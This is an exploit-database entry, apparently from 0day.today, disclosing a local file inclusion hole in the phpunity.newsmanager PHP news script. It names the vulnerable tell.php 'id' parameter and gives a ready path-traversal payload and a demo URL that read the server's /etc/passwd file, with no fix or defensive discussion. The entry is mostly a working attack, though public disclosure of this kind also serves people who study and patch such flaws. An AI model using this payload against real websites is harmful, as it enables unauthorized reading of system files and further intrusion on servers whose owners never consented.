id: 10741
date: 01/30/2010
title: phpunity.newsmanager LFI Vulnerability
author: kaMtiEz
cves: 

======================================
phpunity.newsmanager LFI Vulnerability
======================================

[ Software Information ]
 
[+] Vendor : http://www.perlunity.de/
[+] Download : http://www.perlunity.de/php/scripts/phpunity.newsmanager.shtml
[+] version : -
[+] Vulnerability : LFI
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
 
[ Vulnerable File ]
 
http://server/[kaMtiEz]/misc/tell_a_friend/tell.php?id=[INDONESIANCODER]
 
[ EXPLOIT ]
 
../../../../../../../etc/passwd
 
[ DEMO ]
 
http://server/phpunity.newsmanager/phpunity-newsmanager/misc/tell_a_friend/tell.php?id=../../../../../../../etc/passwd
 
 


#  0day.today [2023-03-22]  #